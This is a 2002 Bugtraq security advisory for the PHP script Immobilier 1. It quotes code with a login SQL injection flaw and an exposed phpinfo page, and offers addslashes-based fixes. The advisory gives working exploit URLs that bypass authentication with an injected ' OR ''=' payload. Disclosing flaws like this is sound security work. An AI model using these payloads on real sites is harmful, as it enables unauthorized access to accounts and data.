Bugtraq mailing list archives
Immobilier 1 (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 25 Nov 2002 17:33:24 +0100
Informations :
°°°°°°°°°°°°°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
agentadmin.php :
--------------------------------------------------------------
[...]
} elseif ($agentname != "" OR $current_user != "")
{
$sql = "SELECT id FROM agents WHERE agent='$agentname' and
agentpass='$agentpassword'";
$result = mysql_query($sql) or die("Couldn't execute query.");
$num = mysql_numrows($result);
if ($num == 1) {
session_register("agentname");
session_register("agentpassword");
[...]
session_register("current_user");
session_register("agent");
[...]
--------------------------------------------------------------
admin/phpinfo.php :
-----------
<?
phpinfo();
?>
-----------
Exploits :
°°°°°°°°°°
http://[target]/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]&agentpasword='%20OR%20''='
http://[target]/admin/phpinfo.php
Solutions :
°°°°°°°°°°°
- Delete /admin/phpinfo.php
- Put this lines :
------------------------------------------
$agentname=addslashes($agentname);
$currentuser=addslashes($currentuser);
$agentpassword=addslashes($agentpassword);
------------------------------------------
into common.php.
A patch can be found on http://www.phpsecure.org.
More details :
°°°°°°°°°°°°°°
In french :
http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
Current thread:
- Immobilier 1 (PHP) Frog Man (Nov 26)